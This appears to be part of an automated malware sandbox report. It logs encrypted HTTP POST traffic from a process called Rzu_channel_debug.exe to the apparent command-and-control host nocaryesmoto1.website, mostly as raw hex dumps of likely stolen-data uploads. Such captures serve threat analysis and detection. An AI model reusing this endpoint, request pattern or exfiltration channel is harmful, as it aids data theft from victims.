                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 1a 26 61 91 c4 20 39 49 ae d6 c4 e0 e6 ca ec c2 b0 d2 d6 d4 c2 ec d6 52 e8 ec d6 dc c2 ce e0 b0 d2 d6 d4 c2 ec d6 52 ce d6 ec c2 e1 07 67 08 12 00 1f 00 c8 e1 07 c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 e4 d4 ce b0 ac c2 ca d0 a4 94 8e b0 ee c2 ec e4 c2 ec b0 90 d6 ce ca d0 8a e8 e8 80 ca e0 ca b5 0c 4b 01 12 00 0e 00 c8 b5 0c c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 e6 ca d0 d0 c2 e0 ee b0 8a ec d2 d6 ec fa 21 0f f8 07 12 00 11 00 c8 21 0f c8 0b 1d 14 aa 08 8d 1a 26 61 91 c4 20 39 49 ae 96 84 a0 a6 8a ac 82 b0 a0 da c6 d8 e0 a4 94 8e 65 0e 47 05 12 00 08 00 c6 65 0e c6 0b 1d 14 aa 08 8d c9 62 d3 88 06 40 14 91 43 31 0f 84 8a 0b 2f 80 c4 0c 63 0a 0e 00 04 00 ce c4 0c ce 0b 1d 14 f3 04 8d 11 61 cc a6 ac 7a 6e a1 08 02 3a 06 0e 00 04 00 ce 08 02 ce
                                                                                                                                          Data Ascii: &a 9IRRg&a 9IK&a 9I!!&a 9IeGeb@C1/cazn:
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 93 86 ba 06 5c 03 12 00 08 00 c8 ba 06 c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 e8 ec d6 c4 da d0 c2 ee 8e 0c a4 0a 12 00 08 00 c6 8e 0c c6 0b 1d 14 9a 08 8d 0d 26 ca ac ce 2b 91 ec 86 75 16 a0 42 60 aa fd ee 04 b9 08 12 00 19 00 c8 ee 04 c8 0b 1d 14 dc 08 8d 1a 26 61 91 c4 20 39 49 d2 c2 ee ee c2 d4 c6 c2 ec ee b0 80 da ee ce d6 ec c0 b0 ae e0 ca cc d0 c2 0a 0c 92 01 12 00 07 00 c8 0a 0c c8 0b 1d 14 9d 08 8d 1a 26 61 91 c4 20 39 49 8e a2 ac ac 82 94 a0 ac 08 93 0e 12 00 12 00 c8 ac 08 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ca ec d2 d6 ec fa 5c e6 ca d0 d0 c2 e0 54 d0 d2 c0 cc 1e 06 8a 02 12 00 0b 00 c8 1e 06 c8 0b 1d 14 06 08 8d 1a 26 61 91 c4 20 39 49 e4 e8 d4 b0 96 e8 c2 d4 a4 a8 94 ed 0d 8e 05 0e 00 04 00 ce ed 0d ce 0b 1d 14 06 04 8d e6 90
                                                                                                                                          Data Ascii: \&a 9I&+uB`&a 9I&a 9I&a 9I\T&a 9I
                                                                                                                                          2024-10-19 17:53:58 UTC1369INData Raw: 8e d6 d6 de da c2 ee 57 0d 89 06 0e 00 04 00 ce 57 0d ce 0b 1d 14 06 04 8d 05 86 75 99 b8 99 d7 9e 2b 0f 25 04 0e 00 04 00 ce 2b 0f ce 0b 1d 14 f3 04 8d 6f df 53 6a d3 c4 f1 6d 41 08 de 09 12 00 08 00 c6 41 08 c6 0b 1d 14 aa 08 8d ad a2 fc 56 18 69 51 5c 26 f1 20 5a 94 22 6a 4d d6 00 9e 00 12 00 0f 00 c8 d6 00 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 8e d6 da d4 d6 d2 da b0 8e d6 da d4 d6 d2 da 71 01 53 08 12 00 0d 00 c8 71 01 c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 ca ec d2 d6 ec fa 5c e6 ca d0 d0 c2 e0 ad 0d 6f 0e 0e 00 04 00 ce ad 0d ce 0b 1d 14 aa 04 8d 71 fe b3 99 44 f6 11 9e f9 0a 95 00 0e 00 04 00 ce f9 0a ce 0b 1d 14 f3 04 8d 5e 7c 3f b8 e3 86 68 ba ba 0e e7 09 12 00 0e 00 c8 ba 0e c8 0b 1d 14 f3 08 8d 1a 26 61 91 c4 20 39 49 92 d6 d4 c2
                                                                                                                                          Data Ascii: WWu+%+oSjmAAViQ\& Z"jM&a 9IqSq&a 9I\oqD^|?h&a 9I


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449747188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:53:59 UTC426OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 208
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:53:59 UTC208OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 bb d2 17 22 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 0e 08 08 08 7f ad 26 4c 08 08 08 08 08 08 08 08 2d 89 29 cc 08 08 08 7f ad 26 4c 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii: "OQ~9I&L-)&LPRR
                                                                                                                                          2024-10-19 17:54:00 UTC785INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:00 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSwv0efenoLAcF3NZfFW4ecGtW7CxrKHl0yaj0Tg0SE9mOBZUEqWzZ1HOCl2rpTrhtk7ocBqaeTD7onBZ1%2FefcNshPrJxv3UNC21zqZhuGwiISiTyaLiz7y%2Ft3bmFPtZZB8ZIHA7ABA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a17ccce0e528-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1253&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1270&delivery_rate=2309409&cwnd=251&unsent_bytes=0&cid=8f9360be413a00ac&ts=399&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449758188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:02 UTC428OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 49746
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:02 UTC15331OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 c7 6b 00 00 ba c0 bf 15 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 6d 0c 08 08 7d 89 77 22 08 08 08 08 08 08 08 08 2f 89 29 2d 21 45 8e d8 ec d6 d2 c2 bb 60 8e 7c b0 a2 ee c2 ec ee b0 dc d6 d4 c2 ee b0 8a e8 e8 80 ca e0 ca b0 90 d6 ce ca d0 b0 86 d6 d6 c6 d0 c2 b0 8e d8 ec d6 d2 c2 b0 a2 ee c2 ec 48 80 ca e0 ca 2b 27 47 80 c2 c4 ca e2 d0 e0 bb 70 8e 7c b0 a2 ee c2 ec ee b0 dc d6 d4 c2 ee b0 8a e8 e8 80 ca e0 ca b0 90 d6 ce ca d0 b0 86 d6 d6 c6 d0 c2 b0 8e d8 ec d6 d2 c2 b0 a2 ee c2 ec 48 80 ca e0 ca b0 80 c2 c4 ca e2 d0 e0 bb 60 ce d8 ec d6 d2 da e2 d2 b6 cc ec d6 e6 ee c2 ec ee b0 8e d8 ec d6 d2 c2 b0 e8 ec d6 c4 da d0 c2 ee b0 80 c2 c4 ca e2 d0 e0 b0 90 d6 c6 da d4 48 80 ca e0 ca bb 6a ce d8
                                                                                                                                          Data Ascii: kOQ~9Im}w"/)-!E`|H+'Gp|H`Hj
                                                                                                                                          2024-10-19 17:54:02 UTC15331OUTData Raw: 3b dd 6b 17 64 3b 53 d7 b3 11 e7 e2 55 72 2b ae 65 a4 c6 af 34 ff d8 55 e3 51 39 91 34 7c 40 70 47 fb fa 64 b2 9f de 7d 25 26 df bf 7f db bc d7 49 ce 05 d5 f8 af b1 c1 24 df 1e 1a 3d b6 e6 3d 4b 2b aa 80 f7 18 fd 8d 75 9b f1 2b 8d 53 7c f5 65 da 38 d1 a4 72 6a a6 2a f1 04 d8 c3 f3 04 59 6e 55 a3 3a a7 85 fd 3c 49 95 79 64 a2 ce 7f 2b e6 ee fb ad c5 fd 2f 27 9c f2 e6 0e fb 1d c4 62 ff 14 70 e6 ec 50 2b 72 ee 98 48 8b 40 70 78 36 bc 2f 7e f5 65 bc c6 b0 ae 1e e2 85 62 2b 28 4c 2a 8c 98 fc cd 9a ec 16 fb 40 3b 29 85 17 43 b5 90 f2 40 e2 a0 fd 2d 60 2b d0 44 cf 1b fc d1 03 6b de 8d bb 91 57 47 77 33 74 7c fb 8d 81 37 2b 96 94 39 4b 3a a9 56 b0 df 89 0e 9b d1 db af 8c df 51 b7 1d bf 45 87 32 e6 a7 77 48 f1 8e 6e 60 55 82 04 74 b9 a7 95 2b 9a c1 5a 17 7e 55 a4
                                                                                                                                          Data Ascii: ;kd;SUr+e4UQ94|@pGd}%&I$==K+u+S|e8rj*YnU:<Iyd+/'bpP+rH@px6/~eb+(L*@;)C@-`+DkWGw3t|7+9K:VQE2wHn`Ut+Z~U
                                                                                                                                          2024-10-19 17:54:02 UTC15331OUTData Raw: 19 39 53 39 bb bd 6e be 1b 32 42 2e 6e fb 83 90 f4 6a ef 74 b9 6e ce d3 3b 6b e5 91 b8 ff e7 ce da 3d 24 6c 17 c7 f2 59 f2 2e 3a 0c 7e 9c 44 a6 b9 1f 81 4c ff a4 4b 69 42 20 63 01 cd 25 a9 75 42 21 61 01 14 52 4b ce ee 99 70 37 e7 ca 9f 68 c5 9a 73 16 be 05 9a bc 12 ee dc 14 32 bc c5 c9 a9 21 90 ad 6c b6 9a 9f f0 42 52 ef 23 61 91 a6 ad 6c b6 9a 9f f0 42 52 ef 23 61 91 a6 4c 6d d6 7d 69 80 c0 56 de 1a 4e bc 8c fa 9e 38 bb 2c 5c bc 8d ea 93 4a ef 4b ab 05 2a 52 af 1b 69 67 4f c0 2b e5 6c 7c 6c 0d 45 d2 00 50 55 3b 3f 42 9a d8 9e 9f 41 39 d8 23 4c b0 25 41 1d c6 b4 07 66 f7 0e 14 26 60 07 d0 0d 48 e1 18 0d 48 11 18 0d c9 05 1c 19 5a 4b 5d e5 6b ff 87 3f 9b 1c 8c 02 53 9d 44 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08
                                                                                                                                          Data Ascii: 9S9n2B.njtn;k=$lY.:~DLKiB c%uB!aRKp7hs2!lBR#alBR#aLm}iVN8,\JK*RigO+l|lEPU;?BA9#L%Af&`HHZK]k?SD
                                                                                                                                          2024-10-19 17:54:02 UTC3753OUTData Raw: 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-10-19 17:54:02 UTC790INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:02 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7tNORHWEGK7l5E0ojYZ8HUzNSV5rOaAMdy1Co6HTlh%2BBIBVBN671GBegYa7u9zvID4yuXeN3PK8pObD9gK2Y%2F2w5iDuhLwr7k00q5d46QF8ROXpZQk6KDCoD2aAjEgWLqncxFZK%2BTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a18c2c27e8fd-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=23&recv=57&lost=0&retrans=0&sent_bytes=2854&recv_bytes=50942&delivery_rate=2043754&cwnd=251&unsent_bytes=0&cid=ae715ee650f2ae2e&ts=570&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449769188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:03 UTC426OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 745
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:03 UTC745OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 e3 c7 57 1e 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 0e 08 08 08 cf 87 a6 34 08 08 08 08 08 08 08 08 2d 89 29 cc 08 08 08 cf 87 a6 34 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 a7 00 00 00 f1 e3 99 03 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 22 08 08 08 eb cf 3b 0e 08 08 08 08 08 08 08 08 2d 89 2d 23 89 0c 0a 4f 2d 89 08 49 23 89 0a 0a 4f 2d 89 08 49 cc 08
                                                                                                                                          Data Ascii: WOQ~9I4-)4PRROQ~9I";--#O-I#O-I
                                                                                                                                          2024-10-19 17:54:03 UTC785INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:03 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dW1mW3rahs5J5wTuqnq8igR6B5tMvLWYW4ykpRM6nQ3AxaMhgX6gjJYoqaP53ZZtyb4N7wh2LxuoNL5A6TtCxzj%2BcL%2BuoyGHfeJh7vq2oOBPmDj0uM80HAz4meuzCLcYXkqZNmtaG9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a1940a96474f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1807&delivery_rate=2696461&cwnd=251&unsent_bytes=0&cid=4e3e915ca95638b1&ts=431&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449775188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:04 UTC426OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 212
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:04 UTC212OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 99 00 00 00 c0 67 68 00 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 06 08 08 08 89 c6 d8 08 08 08 08 08 08 08 08 08 2f 89 89 2d 89 2b 08 cc 08 08 08 89 c6 d8 08 08 08 08 08 08 08 08 08 a8 9e 04 04 50 08 08 08 08 08 08 08 52 08 52 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 a8 9e 04 06 08 08 08 08 08 08 08 08 08 08 08 08 0a 08 08 08 a8 9e 02 04 08 08 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 08 08 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii: ghOQ~9I/-+PRR
                                                                                                                                          2024-10-19 17:54:04 UTC795INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:04 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yowBpid8uum5pSCwFOTfEMMjFO7jdtpbWNh3%2BteZlnwag%2B6jLDbyPyL7r0PIx5mTgmJOXnVcv%2Bfms1r6rNKL5yMC%2B%2FKijkoueMWaR%2Ba8ffbSauwN8BG%2FSKvGqxy4puY4iluZ71qBadY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a19acd122e21-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1274&delivery_rate=2417362&cwnd=245&unsent_bytes=0&cid=631fd805eb470217&ts=398&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449781188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:05 UTC425OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 35
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:05 UTC35OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-10-19 17:54:06 UTC793INHTTP/1.1 204 No Content
                                                                                                                                          Date: Sat, 19 Oct 2024 17:54:06 GMT
                                                                                                                                          Connection: close
                                                                                                                                          rant: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3EGg23mNRYHgIjjyN6xeQ7Q0N8AlU5Rmq4x6y25IYPQXyH%2F1zUMDWoq3%2BLW%2Bi2S7mx3Xo%2FoBpMlwOQQEIEfGAWfj3w7sJun0wV%2FVSxxHBOor9i2sg3%2FDK3n5rMnHYmDDrOKzjVus3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8d52a1a21c136bd7-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1359&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=2326104&cwnd=249&unsent_bytes=0&cid=d6cb6d13a3091d7b&ts=525&x=0"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449787188.114.97.34437224C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-10-19 17:54:06 UTC428OUTPOST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                                                                          id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5
                                                                                                                                          Content-Length: 86120
                                                                                                                                          Host: nocaryesmoto1.website
                                                                                                                                          2024-10-19 17:54:06 UTC15331OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 2d 50 01 00 10 e0 09 04 4f 00 00 00 08 00 00 00 1a 92 a4 82 51 7e 39 49 5d 10 08 08 28 c9 1a 00 08 08 08 08 08 08 08 08 3f 89 45 7a 60 6c 6c 60 66 43 dc d6 d4 c2 ee 2f 1c 08 93 9c c2 2b 2d 93 02 08 93 00 08 97 08 08 08 0a f7 e1 08 08 bb 44 9a d4 e0 c2 d0 58 ac 5a 48 8e d6 ec c2 58 a0 92 5a 6c 48 8e a8 a2 48 64 64 68 68 48 88 48 6c 54 60 68 48 86 98 fc 2b 77 92 da ce ec d6 ee d6 c4 e0 48 8c ca ee da ce 48 80 da ee e8 d0 ca fa 48 8a c0 ca e8 e0 c2 ec 89 8f b1 08 85 49 45 ae fa ee e0 c2 d2 59 ac c2 c6 da ee e0 ec fa 59 ee d2 ee ee 54 c2 f8 c2 5b ce ee ec ee ee 54 c2 f8 c2 5f e6 da d4 da d4 da e0 54 c2 f8 c2 5b ce ee ec ee ee 54 c2 f8 c2 51 e6 da d4 d0 d6 c6 d6 d4 54 c2 f8 c2 51 ee c2 ec e4 da ce c2 ee
                                                                                                                                          Data Ascii: -POQ~9I](?Ez`ll`fC/+-DXZHXZlHHddhhHHlT`hH+wHHHIEYYT[T_T[TQTQ
                                                                                                                                          2024-10-19 17:54:06 UTC15331OUTData Raw: 1d dc af 47 12 2b c6 93 3c fa ab 46 b4 7d 2d 76 01 ae 45 d2 a9 43 af 85 0c 26 75 45 e9 5b b1 2d 27 a6 5a a4 b1 26 fc bc 71 59 42 fd 33 04 b0 a6 69 5d 50 3a 39 14 a1 fd b6 23 55 a7 1a 97 42 5b f4 50 c2 d7 99 ad 9d c8 32 7d e8 67 cd cd 8b c7 21 1a 84 05 ca 5f 1e 03 a3 1b a6 10 d4 c4 57 be 70 5d d8 6a f5 a8 9a 26 33 c5 b7 3b 1e 22 2b d2 80 5b b1 f8 cc c7 96 57 e1 62 05 d6 61 c6 db a6 b8 c4 fd 09 b5 3a 3b d1 19 a7 57 4a 4e 4e 3b 2a 6d 1d 27 3e 30 ed 28 56 ec d7 50 15 75 e6 98 82 48 5a 79 53 39 90 54 30 f9 36 c0 15 62 0c a9 03 9b 09 b9 28 28 60 0b 2b 39 10 8d 0e 86 e8 ce 20 83 4a e1 5a 18 da 81 98 c4 0a eb 4e f0 db e5 7e 0f 0f 9f 00 4e 5c 60 eb 53 c9 2e 51 15 50 9e 5b 54 4d 30 73 62 21 e8 ab bc 05 b4 b0 39 7b 3e 9e 34 ee d1 de 4b 32 cc f2 62 7e 17 99 6f 53 3b
                                                                                                                                          Data Ascii: G+<F}-vEC&uE[-'Z&qYB3i]P:9#UB[P2}g!_Wp]j&3;"+[Wba:;WJNN;*m'>0(VPuHZyS9T06b((`+9 JZN~N\`S.QP[TM0sb!9{>4K2b~oS;
